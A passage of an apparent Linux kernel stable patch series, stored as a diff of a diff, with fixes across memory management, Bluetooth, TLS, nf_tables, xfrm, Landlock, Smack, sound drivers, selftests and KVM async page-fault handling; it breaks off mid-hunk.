+diff --git a/mm/migrate.c b/mm/migrate.c
+index c93dd6a31c31a..c5968021fde0a 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -423,8 +423,12 @@ int folio_migrate_mapping(struct address_space *mapping,
+ 	if (folio_test_swapbacked(folio)) {
+ 		__folio_set_swapbacked(newfolio);
+ 		if (folio_test_swapcache(folio)) {
++			int i;
++
+ 			folio_set_swapcache(newfolio);
+-			newfolio->private = folio_get_private(folio);
++			for (i = 0; i < nr; i++)
++				set_page_private(folio_page(newfolio, i),
++					page_private(folio_page(folio, i)));
+ 		}
+ 		entries = nr;
+ 	} else {
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index c783806eefc9f..a7537da43bd45 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -5012,6 +5012,7 @@ __alloc_pages_slowpath(gfp_t gfp_mask, unsigned int order,
+ 						struct alloc_context *ac)
+ {
+ 	bool can_direct_reclaim = gfp_mask & __GFP_DIRECT_RECLAIM;
++	bool can_compact = gfp_compaction_allowed(gfp_mask);
+ 	const bool costly_order = order > PAGE_ALLOC_COSTLY_ORDER;
+ 	struct page *page = NULL;
+ 	unsigned int alloc_flags;
+@@ -5090,7 +5091,7 @@ __alloc_pages_slowpath(gfp_t gfp_mask, unsigned int order,
+ 	 * Don't try this for allocations that are allowed to ignore
+ 	 * watermarks, as the ALLOC_NO_WATERMARKS attempt didn't yet happen.
+ 	 */
+-	if (can_direct_reclaim &&
++	if (can_direct_reclaim && can_compact &&
+ 			(costly_order ||
+ 			   (order > 0 && ac->migratetype != MIGRATE_MOVABLE))
+ 			&& !gfp_pfmemalloc_allowed(gfp_mask)) {
+@@ -5188,9 +5189,10 @@ __alloc_pages_slowpath(gfp_t gfp_mask, unsigned int order,
+ 
+ 	/*
+ 	 * Do not retry costly high order allocations unless they are
+-	 * __GFP_RETRY_MAYFAIL
++	 * __GFP_RETRY_MAYFAIL and we can compact
+ 	 */
+-	if (costly_order && !(gfp_mask & __GFP_RETRY_MAYFAIL))
++	if (costly_order && (!can_compact ||
++			     !(gfp_mask & __GFP_RETRY_MAYFAIL)))
+ 		goto nopage;
+ 
+ 	if (should_reclaim_retry(gfp_mask, order, ac, alloc_flags,
+@@ -5203,7 +5205,7 @@ __alloc_pages_slowpath(gfp_t gfp_mask, unsigned int order,
+ 	 * implementation of the compaction depends on the sufficient amount
+ 	 * of free memory (see __compaction_suitable)
+ 	 */
+-	if (did_some_progress > 0 &&
++	if (did_some_progress > 0 && can_compact &&
+ 			should_compact_retry(ac, order, alloc_flags,
+ 				compact_result, &compact_priority,
+ 				&compaction_retries))
+diff --git a/mm/swapfile.c b/mm/swapfile.c
+index cca9fda9d036f..0d6182db44a6a 100644
+--- a/mm/swapfile.c
++++ b/mm/swapfile.c
+@@ -1222,6 +1222,18 @@ static unsigned char __swap_entry_free_locked(struct swap_info_struct *p,
+ }
+ 
+ /*
++ * When we get a swap entry, if there aren't some other ways to
++ * prevent swapoff, such as the folio in swap cache is locked, page
++ * table lock is held, etc., the swap entry may become invalid because
++ * of swapoff.  Then, we need to enclose all swap related functions
++ * with get_swap_device() and put_swap_device(), unless the swap
++ * functions call get/put_swap_device() by themselves.
++ *
++ * Note that when only holding the PTL, swapoff might succeed immediately
++ * after freeing a swap entry. Therefore, immediately after
++ * __swap_entry_free(), the swap info might become stale and should not
++ * be touched without a prior get_swap_device().
++ *
+  * Check whether swap entry is valid in the swap device.  If so,
+  * return pointer to swap_info_struct, and keep the swap entry valid
+  * via preventing the swap device from being swapoff, until
+@@ -1230,9 +1242,8 @@ static unsigned char __swap_entry_free_locked(struct swap_info_struct *p,
+  * Notice that swapoff or swapoff+swapon can still happen before the
+  * percpu_ref_tryget_live() in get_swap_device() or after the
+  * percpu_ref_put() in put_swap_device() if there isn't any other way
+- * to prevent swapoff, such as page lock, page table lock, etc.  The
+- * caller must be prepared for that.  For example, the following
+- * situation is possible.
++ * to prevent swapoff.  The caller must be prepared for that.  For
++ * example, the following situation is possible.
+  *
+  *   CPU1				CPU2
+  *   do_swap_page()
+@@ -1624,13 +1635,19 @@ int free_swap_and_cache(swp_entry_t entry)
+ 	if (non_swap_entry(entry))
+ 		return 1;
+ 
+-	p = _swap_info_get(entry);
++	p = get_swap_device(entry);
+ 	if (p) {
++		if (WARN_ON(data_race(!p->swap_map[swp_offset(entry)]))) {
++			put_swap_device(p);
++			return 0;
++		}
++
+ 		count = __swap_entry_free(p, entry);
+ 		if (count == SWAP_HAS_CACHE &&
+ 		    !swap_page_trans_huge_swapped(p, entry))
+ 			__try_to_reclaim_swap(p, swp_offset(entry),
+ 					      TTRS_UNMAPPED | TTRS_FULL);
++		put_swap_device(p);
+ 	}
+ 	return p != NULL;
+ }
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 9f3cfb7caa48d..a3b1d8e5dbb3d 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -6024,7 +6024,7 @@ static void shrink_lruvec(struct lruvec *lruvec, struct scan_control *sc)
+ /* Use reclaim/compaction for costly allocs or under memory pressure */
+ static bool in_reclaim_compaction(struct scan_control *sc)
+ {
+-	if (IS_ENABLED(CONFIG_COMPACTION) && sc->order &&
++	if (gfp_compaction_allowed(sc->gfp_mask) && sc->order &&
+ 			(sc->order > PAGE_ALLOC_COSTLY_ORDER ||
+ 			 sc->priority < DEF_PRIORITY - 2))
+ 		return true;
+@@ -6266,6 +6266,9 @@ static inline bool compaction_ready(struct zone *zone, struct scan_control *sc)
+ 	unsigned long watermark;
+ 	enum compact_result suitable;
+ 
++	if (!gfp_compaction_allowed(sc->gfp_mask))
++		return false;
++
+ 	suitable = compaction_suitable(zone, sc->order, 0, sc->reclaim_idx);
+ 	if (suitable == COMPACT_SUCCESS)
+ 		/* Allocation should succeed already. Don't reclaim. */
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 70f24dc75b596..02e67ff05b7b4 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2838,7 +2838,7 @@ static void hci_cancel_cmd_sync(struct hci_dev *hdev, int err)
+ 	cancel_delayed_work_sync(&hdev->ncmd_timer);
+ 	atomic_set(&hdev->cmd_cnt, 1);
+ 
+-	hci_cmd_sync_cancel_sync(hdev, -err);
++	hci_cmd_sync_cancel_sync(hdev, err);
+ }
+ 
+ /* Suspend HCI device */
+@@ -2858,7 +2858,7 @@ int hci_suspend_dev(struct hci_dev *hdev)
+ 		return 0;
+ 
+ 	/* Cancel potentially blocking sync operation before suspend */
+-	hci_cancel_cmd_sync(hdev, -EHOSTDOWN);
++	hci_cancel_cmd_sync(hdev, EHOSTDOWN);
+ 
+ 	hci_req_sync_lock(hdev);
+ 	ret = hci_suspend_sync(hdev);
+@@ -4169,7 +4169,7 @@ static void hci_send_cmd_sync(struct hci_dev *hdev, struct sk_buff *skb)
+ 
+ 	err = hci_send_frame(hdev, skb);
+ 	if (err < 0) {
+-		hci_cmd_sync_cancel_sync(hdev, err);
++		hci_cmd_sync_cancel_sync(hdev, -err);
+ 		return;
+ 	}
+ 
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 65b2ad34179f8..7e64cf880f9f1 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -678,7 +678,10 @@ void hci_cmd_sync_cancel_sync(struct hci_dev *hdev, int err)
+ 	bt_dev_dbg(hdev, "err 0x%2.2x", err);
+ 
+ 	if (hdev->req_status == HCI_REQ_PEND) {
+-		hdev->req_result = err;
++		/* req_result is __u32 so error must be positive to be properly
++		 * propagated.
++		 */
++		hdev->req_result = err < 0 ? -err : err;
+ 		hdev->req_status = HCI_REQ_CANCELED;
+ 
+ 		wake_up_interruptible(&hdev->req_wait_q);
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 6cf0b77839d1d..1e57027da2913 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -2075,15 +2075,14 @@ static int ieee80211_change_station(struct wiphy *wiphy,
+ 		}
+ 
+ 		if (sta->sdata->vif.type == NL80211_IFTYPE_AP_VLAN &&
+-		    sta->sdata->u.vlan.sta) {
+-			ieee80211_clear_fast_rx(sta);
++		    sta->sdata->u.vlan.sta)
+ 			RCU_INIT_POINTER(sta->sdata->u.vlan.sta, NULL);
+-		}
+ 
+ 		if (test_sta_flag(sta, WLAN_STA_AUTHORIZED))
+ 			ieee80211_vif_dec_num_mcast(sta->sdata);
+ 
+ 		sta->sdata = vlansdata;
++		ieee80211_check_fast_rx(sta);
+ 		ieee80211_check_fast_xmit(sta);
+ 
+ 		if (test_sta_flag(sta, WLAN_STA_AUTHORIZED)) {
+diff --git a/net/mac802154/llsec.c b/net/mac802154/llsec.c
+index 55550ead2ced8..a4cc9d077c59c 100644
+--- a/net/mac802154/llsec.c
++++ b/net/mac802154/llsec.c
+@@ -265,19 +265,27 @@ int mac802154_llsec_key_add(struct mac802154_llsec *sec,
+ 	return -ENOMEM;
+ }
+ 
++static void mac802154_llsec_key_del_rcu(struct rcu_head *rcu)
++{
++	struct ieee802154_llsec_key_entry *pos;
++	struct mac802154_llsec_key *mkey;
++
++	pos = container_of(rcu, struct ieee802154_llsec_key_entry, rcu);
++	mkey = container_of(pos->key, struct mac802154_llsec_key, key);
++
++	llsec_key_put(mkey);
++	kfree_sensitive(pos);
++}
++
+ int mac802154_llsec_key_del(struct mac802154_llsec *sec,
+ 			    const struct ieee802154_llsec_key_id *key)
+ {
+ 	struct ieee802154_llsec_key_entry *pos;
+ 
+ 	list_for_each_entry(pos, &sec->table.keys, list) {
+-		struct mac802154_llsec_key *mkey;
+-
+-		mkey = container_of(pos->key, struct mac802154_llsec_key, key);
+-
+ 		if (llsec_key_id_equal(&pos->id, key)) {
+ 			list_del_rcu(&pos->list);
+-			llsec_key_put(mkey);
++			call_rcu(&pos->rcu, mac802154_llsec_key_del_rcu);
+ 			return 0;
+ 		}
+ 	}
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 0a86c019a75de..2a5d9075a081d 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -4711,6 +4711,12 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if ((flags & (NFT_SET_EVAL | NFT_SET_OBJECT)) ==
+ 			     (NFT_SET_EVAL | NFT_SET_OBJECT))
+ 			return -EOPNOTSUPP;
++		if ((flags & (NFT_SET_ANONYMOUS | NFT_SET_TIMEOUT | NFT_SET_EVAL)) ==
++			     (NFT_SET_ANONYMOUS | NFT_SET_TIMEOUT))
++			return -EOPNOTSUPP;
++		if ((flags & (NFT_SET_CONSTANT | NFT_SET_TIMEOUT)) ==
++			     (NFT_SET_CONSTANT | NFT_SET_TIMEOUT))
++			return -EOPNOTSUPP;
+ 	}
+ 
+ 	desc.dtype = 0;
+@@ -5132,6 +5138,7 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 
+ 	if (list_empty(&set->bindings) && nft_set_is_anonymous(set)) {
+ 		list_del_rcu(&set->list);
++		set->dead = 1;
+ 		if (event)
+ 			nf_tables_set_notify(ctx, set, NFT_MSG_DELSET,
+ 					     GFP_KERNEL);
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 2bd27b77769cb..bdb5153f3788a 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -51,6 +51,7 @@ struct tls_decrypt_arg {
+ 	struct_group(inargs,
+ 	bool zc;
+ 	bool async;
++	bool async_done;
+ 	u8 tail;
+ 	);
+ 
+@@ -195,6 +196,17 @@ static void tls_decrypt_done(crypto_completion_data_t *data, int err)
+ 	struct sock *sk;
+ 	int aead_size;
+ 
++	/* If requests get too backlogged crypto API returns -EBUSY and calls
++	 * ->complete(-EINPROGRESS) immediately followed by ->complete(0)
++	 * to make waiting for backlog to flush with crypto_wait_req() easier.
++	 * First wait converts -EBUSY -> -EINPROGRESS, and the second one
++	 * -EINPROGRESS -> 0.
++	 * We have a single struct crypto_async_request per direction, this
++	 * scheme doesn't help us, so just ignore the first ->complete().
++	 */
++	if (err == -EINPROGRESS)
++		return;
++
+ 	aead_size = sizeof(*aead_req) + crypto_aead_reqsize(aead);
+ 	aead_size = ALIGN(aead_size, __alignof__(*dctx));
+ 	dctx = (void *)((u8 *)aead_req + aead_size);
+@@ -268,14 +280,19 @@ static int tls_do_decryption(struct sock *sk,
+ 	}
+ 
+ 	ret = crypto_aead_decrypt(aead_req);
+-	if (ret == -EINPROGRESS) {
+-		if (darg->async)
+-			return 0;
++	if (ret == -EINPROGRESS)
++		return 0;
+ 
+-		ret = crypto_wait_req(ret, &ctx->async_wait);
+-	} else if (darg->async) {
+-		atomic_dec(&ctx->decrypt_pending);
++	if (ret == -EBUSY) {
++		ret = tls_decrypt_async_wait(ctx);
++		darg->async_done = true;
++		/* all completions have run, we're not doing async anymore */
++		darg->async = false;
++		return ret;
++		ret = ret ?: -EINPROGRESS;
+ 	}
++
++	atomic_dec(&ctx->decrypt_pending);
+ 	darg->async = false;
+ 
+ 	return ret;
+@@ -449,9 +466,11 @@ static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ 	struct scatterlist *sge;
+ 	struct sk_msg *msg_en;
+ 	struct tls_rec *rec;
+-	bool ready = false;
+ 	struct sock *sk;
+ 
++	if (err == -EINPROGRESS) /* see the comment in tls_decrypt_done() */
++		return;
++
+ 	rec = container_of(aead_req, struct tls_rec, aead_req);
+ 	msg_en = &rec->msg_encrypted;
+ 
+@@ -486,19 +505,16 @@ static void tls_encrypt_done(crypto_completion_data_t *data, int err)
+ 		/* If received record is at head of tx_list, schedule tx */
+ 		first_rec = list_first_entry(&ctx->tx_list,
+ 					     struct tls_rec, list);
+-		if (rec == first_rec)
+-			ready = true;
++		if (rec == first_rec) {
++			/* Schedule the transmission */
++			if (!test_and_set_bit(BIT_TX_SCHEDULED,
++					      &ctx->tx_bitmask))
++				schedule_delayed_work(&ctx->tx_work.work, 1);
++		}
+ 	}
+ 
+ 	if (atomic_dec_and_test(&ctx->encrypt_pending))
+ 		complete(&ctx->async_wait.completion);
+-
+-	if (!ready)
+-		return;
+-
+-	/* Schedule the transmission */
+-	if (!test_and_set_bit(BIT_TX_SCHEDULED, &ctx->tx_bitmask))
+-		schedule_delayed_work(&ctx->tx_work.work, 1);
+ }
+ 
+ static int tls_encrypt_async_wait(struct tls_sw_context_tx *ctx)
+@@ -560,6 +576,10 @@ static int tls_do_encryption(struct sock *sk,
+ 	atomic_inc(&ctx->encrypt_pending);
+ 
+ 	rc = crypto_aead_encrypt(aead_req);
++	if (rc == -EBUSY) {
++		rc = tls_encrypt_async_wait(ctx);
++		rc = rc ?: -EINPROGRESS;
++	}
+ 	if (!rc || rc != -EINPROGRESS) {
+ 		atomic_dec(&ctx->encrypt_pending);
+ 		sge->offset -= prot->prepend_size;
+@@ -1663,8 +1683,11 @@ static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
+ 	/* Prepare and submit AEAD request */
+ 	err = tls_do_decryption(sk, sgin, sgout, dctx->iv,
+ 				data_len + prot->tail_size, aead_req, darg);
+-	if (err)
++	if (err) {
++		if (darg->async_done)
++			goto exit_free_skb;
+ 		goto exit_free_pages;
++	}
+ 
+ 	darg->skb = clear_skb ?: tls_strp_msg(ctx);
+ 	clear_skb = NULL;
+@@ -1676,6 +1699,9 @@ static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
+ 		return err;
+ 	}
+ 
++	if (unlikely(darg->async_done))
++		return 0;
++
+ 	if (prot->tail_size)
+ 		darg->tail = dctx->tail;
+ 
+diff --git a/net/xfrm/xfrm_user.c b/net/xfrm/xfrm_user.c
+index d042ca01211fa..0cc4ed29e9015 100644
+--- a/net/xfrm/xfrm_user.c
++++ b/net/xfrm/xfrm_user.c
+@@ -1979,6 +1979,9 @@ static int copy_to_user_tmpl(struct xfrm_policy *xp, struct sk_buff *skb)
+ 	if (xp->xfrm_nr == 0)
+ 		return 0;
+ 
++	if (xp->xfrm_nr > XFRM_MAX_DEPTH)
++		return -ENOBUFS;
++
+ 	for (i = 0; i < xp->xfrm_nr; i++) {
+ 		struct xfrm_user_tmpl *up = &vec[i];
+ 		struct xfrm_tmpl *kp = &xp->xfrm_vec[i];
+diff --git a/scripts/Makefile.extrawarn b/scripts/Makefile.extrawarn
+index 6bbba36c59695..fa5ef41806882 100644
+--- a/scripts/Makefile.extrawarn
++++ b/scripts/Makefile.extrawarn
+@@ -65,6 +65,8 @@ KBUILD_CFLAGS += $(call cc-disable-warning, pointer-to-enum-cast)
+ KBUILD_CFLAGS += -Wno-tautological-constant-out-of-range-compare
+ KBUILD_CFLAGS += $(call cc-disable-warning, unaligned-access)
+ KBUILD_CFLAGS += $(call cc-disable-warning, cast-function-type-strict)
++KBUILD_CFLAGS += -Wno-enum-compare-conditional
++KBUILD_CFLAGS += -Wno-enum-enum-conversion
+ endif
+ 
+ endif
+diff --git a/security/landlock/syscalls.c b/security/landlock/syscalls.c
+index 2ca0ccbd905ae..d0cb3d0cbf985 100644
+--- a/security/landlock/syscalls.c
++++ b/security/landlock/syscalls.c
+@@ -32,6 +32,18 @@
+ #include "ruleset.h"
+ #include "setup.h"
+ 
++static bool is_initialized(void)
++{
++	if (likely(landlock_initialized))
++		return true;
++
++	pr_warn_once(
++		"Disabled but requested by user space. "
++		"You should enable Landlock at boot time: "
++		"https://docs.kernel.org/userspace-api/landlock.html#boot-time-configuration\n");
++	return false;
++}
++
+ /**
+  * copy_min_struct_from_user - Safe future-proof argument copying
+  *
+@@ -165,7 +177,7 @@ SYSCALL_DEFINE3(landlock_create_ruleset,
+ 	/* Build-time checks. */
+ 	build_check_abi();
+ 
+-	if (!landlock_initialized)
++	if (!is_initialized())
+ 		return -EOPNOTSUPP;
+ 
+ 	if (flags) {
+@@ -311,7 +323,7 @@ SYSCALL_DEFINE4(landlock_add_rule, const int, ruleset_fd,
+ 	struct landlock_ruleset *ruleset;
+ 	int res, err;
+ 
+-	if (!landlock_initialized)
++	if (!is_initialized())
+ 		return -EOPNOTSUPP;
+ 
+ 	/* No flag for now. */
+@@ -402,7 +414,7 @@ SYSCALL_DEFINE2(landlock_restrict_self, const int, ruleset_fd, const __u32,
+ 	struct landlock_cred_security *new_llcred;
+ 	int err;
+ 
+-	if (!landlock_initialized)
++	if (!is_initialized())
+ 		return -EOPNOTSUPP;
+ 
+ 	/*
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index fbadc61feedd1..feba69549d086 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -1309,7 +1309,8 @@ static int smack_inode_setxattr(struct user_namespace *mnt_userns,
+ 		check_star = 1;
+ 	} else if (strcmp(name, XATTR_NAME_SMACKTRANSMUTE) == 0) {
+ 		check_priv = 1;
+-		if (size != TRANS_TRUE_SIZE ||
++		if (!S_ISDIR(d_backing_inode(dentry)->i_mode) ||
++		    size != TRANS_TRUE_SIZE ||
+ 		    strncmp(value, TRANS_TRUE, TRANS_TRUE_SIZE) != 0)
+ 			rc = -EINVAL;
+ 	} else
+@@ -2782,6 +2783,15 @@ static int smack_inode_setsecurity(struct inode *inode, const char *name,
+ 	if (value == NULL || size > SMK_LONGLABEL || size == 0)
+ 		return -EINVAL;
+ 
++	if (strcmp(name, XATTR_SMACK_TRANSMUTE) == 0) {
++		if (!S_ISDIR(inode->i_mode) || size != TRANS_TRUE_SIZE ||
++		    strncmp(value, TRANS_TRUE, TRANS_TRUE_SIZE) != 0)
++			return -EINVAL;
++
++		nsp->smk_flags |= SMK_INODE_TRANSMUTE;
++		return 0;
++	}
++
+ 	skp = smk_import_entry(value, size);
+ 	if (IS_ERR(skp))
+ 		return PTR_ERR(skp);
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 6e759032eba2e..fb12034d464ee 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9792,6 +9792,10 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c8a, "HP EliteBook 630", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c8c, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c90, "HP EliteBook 640", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c91, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c97, "HP ZBook", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca1, "HP ZBook Power", ALC236_FIXUP_HP_GPIO_LED),
+@@ -10750,6 +10754,8 @@ static const struct snd_hda_pin_quirk alc269_pin_fixup_tbl[] = {
+  *   at most one tbl is allowed to define for the same vendor and same codec
+  */
+ static const struct snd_hda_pin_quirk alc269_fallback_pin_fixup_tbl[] = {
++	SND_HDA_PIN_QUIRK(0x10ec0256, 0x1025, "Acer", ALC2XX_FIXUP_HEADSET_MIC,
++		{0x19, 0x40000000}),
+ 	SND_HDA_PIN_QUIRK(0x10ec0289, 0x1028, "Dell", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
+ 		{0x19, 0x40000000},
+ 		{0x1b, 0x40000000}),
+@@ -11439,8 +11445,7 @@ static void alc897_hp_automute_hook(struct hda_codec *codec,
+ 
+ 	snd_hda_gen_hp_automute(codec, jack);
+ 	vref = spec->gen.hp_jack_present ? (PIN_HP | AC_PINCTL_VREF_100) : PIN_HP;
+-	snd_hda_codec_write(codec, 0x1b, 0, AC_VERB_SET_PIN_WIDGET_CONTROL,
+-			    vref);
++	snd_hda_set_pin_ctl(codec, 0x1b, vref);
+ }
+ 
+ static void alc897_fixup_lenovo_headset_mic(struct hda_codec *codec,
+@@ -11449,6 +11454,10 @@ static void alc897_fixup_lenovo_headset_mic(struct hda_codec *codec,
+ 	struct alc_spec *spec = codec->spec;
+ 	if (action == HDA_FIXUP_ACT_PRE_PROBE) {
+ 		spec->gen.hp_automute_hook = alc897_hp_automute_hook;
++		spec->no_shutup_pins = 1;
++	}
++	if (action == HDA_FIXUP_ACT_PROBE) {
++		snd_hda_set_pin_ctl_cache(codec, 0x1a, PIN_IN | AC_PINCTL_VREF_100);
+ 	}
+ }
+ 
+diff --git a/sound/sh/aica.c b/sound/sh/aica.c
+index 6e9d6bd67369a..8b47bfcd90318 100644
+--- a/sound/sh/aica.c
++++ b/sound/sh/aica.c
+@@ -278,7 +278,8 @@ static void run_spu_dma(struct work_struct *work)
+ 		dreamcastcard->clicks++;
+ 		if (unlikely(dreamcastcard->clicks >= AICA_PERIOD_NUMBER))
+ 			dreamcastcard->clicks %= AICA_PERIOD_NUMBER;
+-		mod_timer(&dreamcastcard->timer, jiffies + 1);
++		if (snd_pcm_running(dreamcastcard->substream))
++			mod_timer(&dreamcastcard->timer, jiffies + 1);
+ 	}
+ }
+ 
+@@ -290,6 +291,8 @@ static void aica_period_elapsed(struct timer_list *t)
+ 	/*timer function - so cannot sleep */
+ 	int play_period;
+ 	struct snd_pcm_runtime *runtime;
++	if (!snd_pcm_running(substream))
++		return;
+ 	runtime = substream->runtime;
+ 	dreamcastcard = substream->pcm->private_data;
+ 	/* Have we played out an additional period? */
+@@ -350,12 +353,19 @@ static int snd_aicapcm_pcm_open(struct snd_pcm_substream
+ 	return 0;
+ }
+ 
++static int snd_aicapcm_pcm_sync_stop(struct snd_pcm_substream *substream)
++{
++	struct snd_card_aica *dreamcastcard = substream->pcm->private_data;
++
++	del_timer_sync(&dreamcastcard->timer);
++	cancel_work_sync(&dreamcastcard->spu_dma_work);
++	return 0;
++}
++
+ static int snd_aicapcm_pcm_close(struct snd_pcm_substream
+ 				 *substream)
+ {
+ 	struct snd_card_aica *dreamcastcard = substream->pcm->private_data;
+-	flush_work(&(dreamcastcard->spu_dma_work));
+-	del_timer(&dreamcastcard->timer);
+ 	dreamcastcard->substream = NULL;
+ 	kfree(dreamcastcard->channel);
+ 	spu_disable();
+@@ -401,6 +411,7 @@ static const struct snd_pcm_ops snd_aicapcm_playback_ops = {
+ 	.prepare = snd_aicapcm_pcm_prepare,
+ 	.trigger = snd_aicapcm_pcm_trigger,
+ 	.pointer = snd_aicapcm_pcm_pointer,
++	.sync_stop = snd_aicapcm_pcm_sync_stop,
+ };
+ 
+ /* TO DO: set up to handle more than one pcm instance */
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index e0f406b6646ba..0568e64d10150 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -199,13 +199,6 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21HY"),
+ 		}
+ 	},
+-	{
+-		.driver_data = &acp6x_card,
+-		.matches = {
+-			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "21J2"),
+-		}
+-	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/tools/include/linux/btf_ids.h b/tools/include/linux/btf_ids.h
+index 72535f00572f6..72ea363d434db 100644
+--- a/tools/include/linux/btf_ids.h
++++ b/tools/include/linux/btf_ids.h
+@@ -3,6 +3,8 @@
+ #ifndef _LINUX_BTF_IDS_H
+ #define _LINUX_BTF_IDS_H
+ 
++#include <linux/types.h> /* for u32 */
++
+ struct btf_id_set {
+ 	u32 cnt;
+ 	u32 ids[];
+diff --git a/tools/testing/selftests/mqueue/setting b/tools/testing/selftests/mqueue/setting
+new file mode 100644
+index 0000000000000..a953c96aa16e1
+--- /dev/null
++++ b/tools/testing/selftests/mqueue/setting
+@@ -0,0 +1 @@
++timeout=180
+diff --git a/tools/testing/selftests/net/mptcp/diag.sh b/tools/testing/selftests/net/mptcp/diag.sh
+index 400cf1ce96e31..3df4a8103c76f 100755
+--- a/tools/testing/selftests/net/mptcp/diag.sh
++++ b/tools/testing/selftests/net/mptcp/diag.sh
+@@ -56,7 +56,7 @@ __chk_nr()
+ 			echo "[ skip ] Feature probably not supported"
+ 		else
+ 			echo "[ fail ] expected $expected found $nr"
+-			ret=$test_cnt
++			ret=${KSFT_FAIL}
+ 		fi
+ 	else
+ 		echo "[  ok  ]"
+@@ -100,10 +100,10 @@ wait_msk_nr()
+ 	printf "%-50s" "$msg"
+ 	if [ $i -ge $timeout ]; then
+ 		echo "[ fail ] timeout while expecting $expected max $max last $nr"
+-		ret=$test_cnt
++		ret=${KSFT_FAIL}
+ 	elif [ $nr != $expected ]; then
+ 		echo "[ fail ] expected $expected found $nr"
+-		ret=$test_cnt
++		ret=${KSFT_FAIL}
+ 	else
+ 		echo "[  ok  ]"
+ 	fi
+diff --git a/virt/kvm/async_pf.c b/virt/kvm/async_pf.c
+index 9bfe1d6f6529a..adaf6f141804f 100644
+--- a/virt/kvm/async_pf.c
++++ b/virt/kvm/async_pf.c
+@@ -88,7 +88,27 @@ static void async_pf_execute(struct work_struct *work)
+ 	__kvm_vcpu_wake_up(vcpu);
+ 
+ 	mmput(mm);
+-	kvm_put_kvm(vcpu->kvm);
++}
++
++static void kvm_flush_and_free_async_pf_work(struct kvm_async_pf *work)
++{
++	/*
++	 * The async #PF is "done", but KVM must wait for the work item itself,
++	 * i.e. async_pf_execute(), to run to completion.  If KVM is a module,
++	 * KVM must ensure *no* code owned by the KVM (the module) can be run
++	 * after the last call to module_put().  Note, flushing the work item
++	 * is always required when the item is taken off the completion queue.
++	 * E.g. even if the vCPU handles the item in the "normal" path, the VM
++	 * could be terminated before async_pf_execute() completes.
++	 *
++	 * Wake all events skip the queue and go straight done, i.e. don't
++	 * need to be flushed (but sanity check that the work wasn't queued).
++	 */
++	if (work->wakeup_all)
++		WARN_ON_ONCE(work->work.func);
++	else
++		flush_work(&work->work);
++	kmem_cache_free(async_pf_cache, work);
+ }
+ 
+ void kvm_clear_async_pf_completion_queue(struct kvm_vcpu *vcpu)
+@@ -115,7 +135,6 @@ void kvm_clear_async_pf_completion_queue(struct kvm_vcpu *vcpu)
+ #else
+ 		if (cancel_work_sync(&work->work)) {
+ 			mmput(work->mm);
+-			kvm_put_kvm(vcpu->kvm); /* == work->vcpu->kvm */
+ 			kmem_cache_free(async_pf_cache, work);
+ 		}
+ #endif
+@@ -127,7 +146,10 @@ void kvm_clear_async_pf_completion_queue(struct kvm_vcpu *vcpu)
+ 			list_first_entry(&vcpu->async_pf.done,
+ 					 typeof(*work), link);
+ 		list_del(&work->link);
+-		kmem_cache_free(async_pf_cache, work);
++
++		spin_unlock(&vcpu->async_pf.lock);
